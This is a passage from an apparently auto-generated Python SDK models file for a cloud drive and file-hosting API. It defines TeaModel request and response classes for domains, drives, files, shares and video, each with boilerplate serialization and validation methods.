result['user_id'] = self.user_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('role') is not None:
self.role = m.get('role')
if m.get('user_id') is not None:
self.user_id = m.get('user_id')
return self
class ListAppsResponse(TeaModel):
"""
*\
"""
def __init__(
self,
items: List[GetAppResponse] = None,
next_marker: str = None,
):
# App 列表
self.items = items
# App 分批查询游标
self.next_marker = next_marker
def validate(self):
self.validate_required(self.items, 'items')
if self.items:
for k in self.items:
if k:
k.validate()
def to_map(self):
result = dict()
result['items'] = []
if self.items is not None:
for k in self.items:
result['items'].append(k.to_map() if k else None)
if self.next_marker is not None:
result['next_marker'] = self.next_marker
return result
def from_map(self, m: dict = None):
m = m or dict()
self.items = []
if m.get('items') is not None:
for k in m.get('items'):
temp_model = GetAppResponse()
self.items.append(temp_model.from_map(k))
if m.get('next_marker') is not None:
self.next_marker = m.get('next_marker')
return self
class ListDomainCORSRuleResponse(TeaModel):
"""
list domain cors response
"""
def __init__(
self,
cors_rule_list: List[CorsRule] = None,
domain_id: str = None,
):
# cors rule 列表
self.cors_rule_list = cors_rule_list
# Domain ID
self.domain_id = domain_id
def validate(self):
if self.cors_rule_list:
for k in self.cors_rule_list:
if k:
k.validate()
def to_map(self):
result = dict()
result['cors_rule_list'] = []
if self.cors_rule_list is not None:
for k in self.cors_rule_list:
result['cors_rule_list'].append(k.to_map() if k else None)
if self.domain_id is not None:
result['domain_id'] = self.domain_id
return result
def from_map(self, m: dict = None):
m = m or dict()
self.cors_rule_list = []
if m.get('cors_rule_list') is not None:
for k in m.get('cors_rule_list'):
temp_model = CorsRule()
self.cors_rule_list.append(temp_model.from_map(k))
if m.get('domain_id') is not None:
self.domain_id = m.get('domain_id')
return self
class ListDomainsResponse(TeaModel):
"""
list domain response
"""
def __init__(
self,
items: List[BaseDomainResponse] = None,
next_marker: str = None,
):
# domain 列表
self.items = items
# 下次分页查询游标
self.next_marker = next_marker
def validate(self):
if self.items:
for k in self.items:
if k:
k.validate()
def to_map(self):
result = dict()
result['items'] = []
if self.items is not None:
for k in self.items:
result['items'].append(k.to_map() if k else None)
if self.next_marker is not None:
result['next_marker'] = self.next_marker
return result
def from_map(self, m: dict = None):
m = m or dict()
self.items = []
if m.get('items') is not None:
for k in m.get('items'):
temp_model = BaseDomainResponse()
self.items.append(temp_model.from_map(k))
if m.get('next_marker') is not None:
self.next_marker = m.get('next_marker')
return self
class SetBizCNameCertResponse(TeaModel):
"""
*\
"""
def __init__(
self,
biz_cname: str = None,
cert_name: str = None,
cname_type: str = None,
domain_id: str = None,
is_vpc: bool = None,
):
# biz cname
self.biz_cname = biz_cname
# cert name
self.cert_name = cert_name
# cname type
self.cname_type = cname_type
# domain ID
self.domain_id = domain_id
# is vpc
self.is_vpc = is_vpc
def validate(self):
self.validate_required(self.domain_id, 'domain_id')
def to_map(self):
result = dict()
if self.biz_cname is not None:
result['biz_cname'] = self.biz_cname
if self.cert_name is not None:
result['cert_name'] = self.cert_name
if self.cname_type is not None:
result['cname_type'] = self.cname_type
if self.domain_id is not None:
result['domain_id'] = self.domain_id
if self.is_vpc is not None:
result['is_vpc'] = self.is_vpc
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('biz_cname') is not None:
self.biz_cname = m.get('biz_cname')
if m.get('cert_name') is not None:
self.cert_name = m.get('cert_name')
if m.get('cname_type') is not None:
self.cname_type = m.get('cname_type')
if m.get('domain_id') is not None:
self.domain_id = m.get('domain_id')
if m.get('is_vpc') is not None:
self.is_vpc = m.get('is_vpc')
return self
class SetBizCNameResponse(TeaModel):
"""
*\
"""
def __init__(
self,
biz_cname: str = None,
cname_status: CNameStatus = None,
cname_type: str = None,
domain_id: str = None,
is_vpc: bool = None,
):
# biz cname
self.biz_cname = biz_cname
self.cname_status = cname_status
# cname type
self.cname_type = cname_type
# domain ID
self.domain_id = domain_id
# is vpc
self.is_vpc = is_vpc
def validate(self):
if self.cname_status:
self.cname_status.validate()
self.validate_required(self.domain_id, 'domain_id')
def to_map(self):
result = dict()
if self.biz_cname is not None:
result['biz_cname'] = self.biz_cname
if self.cname_status is not None:
result['cname_status'] = self.cname_status.to_map()
if self.cname_type is not None:
result['cname_type'] = self.cname_type
if self.domain_id is not None:
result['domain_id'] = self.domain_id
if self.is_vpc is not None:
result['is_vpc'] = self.is_vpc
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('biz_cname') is not None:
self.biz_cname = m.get('biz_cname')
if m.get('cname_status') is not None:
temp_model = CNameStatus()
self.cname_status = temp_model.from_map(m['cname_status'])
if m.get('cname_type') is not None:
self.cname_type = m.get('cname_type')
if m.get('domain_id') is not None:
self.domain_id = m.get('domain_id')
if m.get('is_vpc') is not None:
self.is_vpc = m.get('is_vpc')
return self
class SetDataCNameResponse(TeaModel):
"""
*\
"""
def __init__(
self,
data_cname: str = None,
domain_id: str = None,
location: str = None,
):
# datacname
self.data_cname = data_cname
# domain ID
self.domain_id = domain_id
# data location
self.location = location
def validate(self):
self.validate_required(self.data_cname, 'data_cname')
self.validate_required(self.domain_id, 'domain_id')
self.validate_required(self.location, 'location')
def to_map(self):
result = dict()
if self.data_cname is not None:
result['data_cname'] = self.data_cname
if self.domain_id is not None:
result['domain_id'] = self.domain_id
if self.location is not None:
result['location'] = self.location
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('data_cname') is not None:
self.data_cname = m.get('data_cname')
if m.get('domain_id') is not None:
self.domain_id = m.get('domain_id')
if m.get('location') is not None:
self.location = m.get('location')
return self
class UpdateDomainResponse(TeaModel):
"""
create domain response
"""
def __init__(
self,
api_cname: str = None,
app_cname: str = None,
auth_alipay_app_id: str = None,
auth_alipay_enable: bool = None,
auth_alipay_private_key: str = None,
auth_cname: str = None,
auth_config: dict = None,
auth_dingding_app_id: str = None,
auth_dingding_app_secret: str = None,
auth_dingding_enable: bool = None,
auth_endpoint_enable: bool = None,
auth_ram_app_id: str = None,
auth_ram_app_secret: str = None,
auth_ram_enable: bool = None,
created_at: str = None,
data_hash_name: str = None,
description: str = None,
domain_id: str = None,
domain_name: str = None,
event_filename_matches: str = None,
event_mns_endpoint: str = None,
event_mns_topic: str = None,
event_names: List[str] = None,
event_role_arn: str = None,
init_drive_enable: bool = None,
init_drive_size: int = None,
init_drive_store_id: str = None,
mode: str = None,
path_type: str = None,
published_app_access_strategy: AppAccessStrategy = None,
sharable: bool = None,
store_level: str = None,
store_region_list: List[str] = None,
updated_at: str = None,
):
# Domain APICName
self.api_cname = api_cname
# Domain AppCName
self.app_cname = app_cname
# 支付宝 App Id
self.auth_alipay_app_id = auth_alipay_app_id
# 是否开启了支付宝认证
self.auth_alipay_enable = auth_alipay_enable
# 支付宝 App Secret
self.auth_alipay_private_key = auth_alipay_private_key
# Domain AuthCName
self.auth_cname = auth_cname
# 登录相关信息
self.auth_config = auth_config
# 钉钉 App Id
self.auth_dingding_app_id = auth_dingding_app_id
# 钉钉 App Secret
self.auth_dingding_app_secret = auth_dingding_app_secret
# 是否开启了钉钉认证
self.auth_dingding_enable = auth_dingding_enable
self.auth_endpoint_enable = auth_endpoint_enable
# RAM App Id
self.auth_ram_app_id = auth_ram_app_id
# RAM App Secret
self.auth_ram_app_secret = auth_ram_app_secret
# 是否开启了 RAM 认证
self.auth_ram_enable = auth_ram_enable
# Domain 创建时间
self.created_at = created_at
# 数据 Hash 算法
self.data_hash_name = data_hash_name
# Domain 描述
self.description = description
# Domain ID
self.domain_id = domain_id
# Domain 描述
self.domain_name = domain_name
# 事件通知 MNS 匹配文件名
self.event_filename_matches = event_filename_matches
# 事件通知 MNS Endpoint
self.event_mns_endpoint = event_mns_endpoint
# 事件通知 MNS Topic
self.event_mns_topic = event_mns_topic
# 事件名列表
self.event_names = event_names
# 事件通知 Role Arn
self.event_role_arn = event_role_arn
# 是否开启了自动初始化 Drive
self.init_drive_enable = init_drive_enable
# 自动初始化 Drive 大小
self.init_drive_size = init_drive_size
# 自动初始化 Drive 所用 Store ID
self.init_drive_store_id = init_drive_store_id
# Domain 类型
self.mode = mode
# Domain 类型
self.path_type = path_type
self.published_app_access_strategy = published_app_access_strategy
# 是否开启了分享
self.sharable = sharable
# 存储级别
self.store_level = store_level
# 存储 Region 列表
self.store_region_list = store_region_list
# Domain 更新时间
self.updated_at = updated_at
def validate(self):
if self.published_app_access_strategy:
self.published_app_access_strategy.validate()
def to_map(self):
result = dict()
if self.api_cname is not None:
result['api_cname'] = self.api_cname
if self.app_cname is not None:
result['app_cname'] = self.app_cname
if self.auth_alipay_app_id is not None:
result['auth_alipay_app_id'] = self.auth_alipay_app_id
if self.auth_alipay_enable is not None:
result['auth_alipay_enable'] = self.auth_alipay_enable
if self.auth_alipay_private_key is not None:
result['auth_alipay_private_key'] = self.auth_alipay_private_key
if self.auth_cname is not None:
result['auth_cname'] = self.auth_cname
if self.auth_config is not None:
result['auth_config'] = self.auth_config
if self.auth_dingding_app_id is not None:
result['auth_dingding_app_id'] = self.auth_dingding_app_id
if self.auth_dingding_app_secret is not None:
result['auth_dingding_app_secret'] = self.auth_dingding_app_secret
if self.auth_dingding_enable is not None:
result['auth_dingding_enable'] = self.auth_dingding_enable
if self.auth_endpoint_enable is not None:
result['auth_endpoint_enable'] = self.auth_endpoint_enable
if self.auth_ram_app_id is not None:
result['auth_ram_app_id'] = self.auth_ram_app_id
if self.auth_ram_app_secret is not None:
result['auth_ram_app_secret'] = self.auth_ram_app_secret
if self.auth_ram_enable is not None:
result['auth_ram_enable'] = self.auth_ram_enable
if self.created_at is not None:
result['created_at'] = self.created_at
if self.data_hash_name is not None:
result['data_hash_name'] = self.data_hash_name
if self.description is not None:
result['description'] = self.description
if self.domain_id is not None:
result['domain_id'] = self.domain_id
if self.domain_name is not None:
result['domain_name'] = self.domain_name
if self.event_filename_matches is not None:
result['event_filename_matches'] = self.event_filename_matches
if self.event_mns_endpoint is not None:
result['event_mns_endpoint'] = self.event_mns_endpoint
if self.event_mns_topic is not None:
result['event_mns_topic'] = self.event_mns_topic
if self.event_names is not None:
result['event_names'] = self.event_names
if self.event_role_arn is not None:
result['event_role_arn'] = self.event_role_arn
if self.init_drive_enable is not None:
result['init_drive_enable'] = self.init_drive_enable
if self.init_drive_size is not None:
result['init_drive_size'] = self.init_drive_size
if self.init_drive_store_id is not None:
result['init_drive_store_id'] = self.init_drive_store_id
if self.mode is not None:
result['mode'] = self.mode
if self.path_type is not None:
result['path_type'] = self.path_type
if self.published_app_access_strategy is not None:
result['published_app_access_strategy'] = self.published_app_access_strategy.to_map()
if self.sharable is not None:
result['sharable'] = self.sharable
if self.store_level is not None:
result['store_level'] = self.store_level
if self.store_region_list is not None:
result['store_region_list'] = self.store_region_list
if self.updated_at is not None:
result['updated_at'] = self.updated_at
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('api_cname') is not None:
self.api_cname = m.get('api_cname')
if m.get('app_cname') is not None:
self.app_cname = m.get('app_cname')
if m.get('auth_alipay_app_id') is not None:
self.auth_alipay_app_id = m.get('auth_alipay_app_id')
if m.get('auth_alipay_enable') is not None:
self.auth_alipay_enable = m.get('auth_alipay_enable')
if m.get('auth_alipay_private_key') is not None:
self.auth_alipay_private_key = m.get('auth_alipay_private_key')
if m.get('auth_cname') is not None:
self.auth_cname = m.get('auth_cname')
if m.get('auth_config') is not None:
self.auth_config = m.get('auth_config')
if m.get('auth_dingding_app_id') is not None:
self.auth_dingding_app_id = m.get('auth_dingding_app_id')
if m.get('auth_dingding_app_secret') is not None:
self.auth_dingding_app_secret = m.get('auth_dingding_app_secret')
if m.get('auth_dingding_enable') is not None:
self.auth_dingding_enable = m.get('auth_dingding_enable')
if m.get('auth_endpoint_enable') is not None:
self.auth_endpoint_enable = m.get('auth_endpoint_enable')
if m.get('auth_ram_app_id') is not None:
self.auth_ram_app_id = m.get('auth_ram_app_id')
if m.get('auth_ram_app_secret') is not None:
self.auth_ram_app_secret = m.get('auth_ram_app_secret')
if m.get('auth_ram_enable') is not None:
self.auth_ram_enable = m.get('auth_ram_enable')
if m.get('created_at') is not None:
self.created_at = m.get('created_at')
if m.get('data_hash_name') is not None:
self.data_hash_name = m.get('data_hash_name')
if m.get('description') is not None:
self.description = m.get('description')
if m.get('domain_id') is not None:
self.domain_id = m.get('domain_id')
if m.get('domain_name') is not None:
self.domain_name = m.get('domain_name')
if m.get('event_filename_matches') is not None:
self.event_filename_matches = m.get('event_filename_matches')
if m.get('event_mns_endpoint') is not None:
self.event_mns_endpoint = m.get('event_mns_endpoint')
if m.get('event_mns_topic') is not None:
self.event_mns_topic = m.get('event_mns_topic')
if m.get('event_names') is not None:
self.event_names = m.get('event_names')
if m.get('event_role_arn') is not None:
self.event_role_arn = m.get('event_role_arn')
if m.get('init_drive_enable') is not None:
self.init_drive_enable = m.get('init_drive_enable')
if m.get('init_drive_size') is not None:
self.init_drive_size = m.get('init_drive_size')
if m.get('init_drive_store_id') is not None:
self.init_drive_store_id = m.get('init_drive_store_id')
if m.get('mode') is not None:
self.mode = m.get('mode')
if m.get('path_type') is not None:
self.path_type = m.get('path_type')
if m.get('published_app_access_strategy') is not None:
temp_model = AppAccessStrategy()
self.published_app_access_strategy = temp_model.from_map(m['published_app_access_strategy'])
if m.get('sharable') is not None:
self.sharable = m.get('sharable')
if m.get('store_level') is not None:
self.store_level = m.get('store_level')
if m.get('store_region_list') is not None:
self.store_region_list = m.get('store_region_list')
if m.get('updated_at') is not None:
self.updated_at = m.get('updated_at')
return self
class CreateDriveModel(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: CreateDriveResponse = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = CreateDriveResponse()
self.body = temp_model.from_map(m['body'])
return self
class DeleteDriveModel(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
):
self.headers = headers
def validate(self):
pass
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
return self
class GetDriveModel(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: GetDriveResponse = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = GetDriveResponse()
self.body = temp_model.from_map(m['body'])
return self
class GetDefaultDriveModel(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: GetDriveResponse = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = GetDriveResponse()
self.body = temp_model.from_map(m['body'])
return self
class ListDrivesModel(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: ListDriveResponse = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = ListDriveResponse()
self.body = temp_model.from_map(m['body'])
return self
class ListMyDrivesModel(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: ListDriveResponse = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = ListDriveResponse()
self.body = temp_model.from_map(m['body'])
return self
class UpdateDriveModel(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: UpdateDriveResponse = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = UpdateDriveResponse()
self.body = temp_model.from_map(m['body'])
return self
class CompleteFileModel(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: HostingCompleteFileResponse = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = HostingCompleteFileResponse()
self.body = temp_model.from_map(m['body'])
return self
class CopyFileModel(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: HostingCopyFileResponse = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = HostingCopyFileResponse()
self.body = temp_model.from_map(m['body'])
return self
class CreateFileModel(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: HostingCreateFileResponse = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = HostingCreateFileResponse()
self.body = temp_model.from_map(m['body'])
return self
class DeleteFileModel(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
):
self.headers = headers
def validate(self):
pass
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
return self
class GetFileModel(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: HostingGetFileResponse = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = HostingGetFileResponse()
self.body = temp_model.from_map(m['body'])
return self
class GetDownloadUrlModel(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: HostingGetDownloadUrlResponse = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = HostingGetDownloadUrlResponse()
self.body = temp_model.from_map(m['body'])
return self
class GetSecureUrlModel(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: HostingGetSecureUrlResponse = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = HostingGetSecureUrlResponse()
self.body = temp_model.from_map(m['body'])
return self
class GetUploadUrlModel(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: HostingGetUploadUrlResponse = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = HostingGetUploadUrlResponse()
self.body = temp_model.from_map(m['body'])
return self
class ListFileModel(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: HostingListFileResponse = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = HostingListFileResponse()
self.body = temp_model.from_map(m['body'])
return self
class ListUploadedPartsModel(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: HostingListUploadedPartResponse = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = HostingListUploadedPartResponse()
self.body = temp_model.from_map(m['body'])
return self
class MoveFileModel(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: HostingMoveFileResponse = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = HostingMoveFileResponse()
self.body = temp_model.from_map(m['body'])
return self
class VideoDefinitionModel(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: HostingVideoDefinitionResponse = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = HostingVideoDefinitionResponse()
self.body = temp_model.from_map(m['body'])
return self
class VideoLicenseModel(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: HostingVideoDRMLicenseResponse = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = HostingVideoDRMLicenseResponse()
self.body = temp_model.from_map(m['body'])
return self
class VideoM3u8Model(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: bytes = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.body, 'body')
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
self.body = m.get('body')
return self
class VideoTranscodeModel(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: HostingVideoTranscodeResponse = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = HostingVideoTranscodeResponse()
self.body = temp_model.from_map(m['body'])
return self
class CreateShareModel(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: CreateShareResponse = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = CreateShareResponse()
self.body = temp_model.from_map(m['body'])
return self
class DeleteShareModel(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
):
self.headers = headers
def validate(self):
pass
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
return self
class GetShareModel(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: GetShareResponse = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = GetShareResponse()
self.body = temp_model.from_map(m['body'])
return self
class ListShareModel(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: ListShareResponse = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = ListShareResponse()
self.body = temp_model.from_map(m['body'])
return self
class UpdateShareModel(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: UpdateShareResponse = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = UpdateShareResponse()
self.body = temp_model.from_map(m['body'])
return self
class ListStorefileModel(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: ListStoreFileResponse = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = ListStoreFileResponse()
self.body = temp_model.from_map(m['body'])
return self
class BaseCompleteFileRequest(TeaModel):
"""
complete file request
"""
def __init__(
self,
addition_data: dict = None,
drive_id: str = None,
part_info_list: List[UploadPartInfo] = None,
share_id: str = None,
upload_id: str = None,
):
# addition_data
self.addition_data = addition_data
# drive_id
self.drive_id = drive_id
# part_info_list
self.part_info_list = part_info_list
self.share_id = share_id
# upload_id
self.upload_id = upload_id
def validate(self):
if self.drive_id is not None:
self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
if self.part_info_list:
for k in self.part_info_list:
if k:
k.validate()
def to_map(self):
result = dict()
if self.addition_data is not None:
result['addition_data'] = self.addition_data
if self.drive_id is not None:
result['drive_id'] = self.drive_id
result['part_info_list'] = []
if self.part_info_list is not None:
for k in self.part_info_list:
result['part_info_list'].append(k.to_map() if k else None)
if self.share_id is not None:
result['share_id'] = self.share_id
if self.upload_id is not None:
result['upload_id'] = self.upload_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('addition_data') is not None:
self.addition_data = m.get('addition_data')
if m.get('drive_id') is not None:
self.drive_id = m.get('drive_id')
self.part_info_list = []
if m.get('part_info_list') is not None:
for k in m.get('part_info_list'):
temp_model = UploadPartInfo()
self.part_info_list.append(temp_model.from_map(k))
if m.get('share_id') is not None:
self.share_id = m.get('share_id')
if m.get('upload_id') is not None:
self.upload_id = m.get('upload_id')
return self
class BaseCreateFileRequest(TeaModel):
"""
create file request
"""
def __init__(
self,
addition_data: dict = None,
content_md_5: str = None,
content_type: str = None,
name: str = None,
part_info_list: List[UploadPartInfo] = None,
size: int = None,
type: str = None,
):
# addition_data
self.addition_data = addition_data
# ContentMd5
self.content_md_5 = content_md_5
# ContentType
self.content_type = content_type
# Name
self.name = name
# part_info_list
self.part_info_list = part_info_list
# Size
self.size = size
# Type
self.type = type
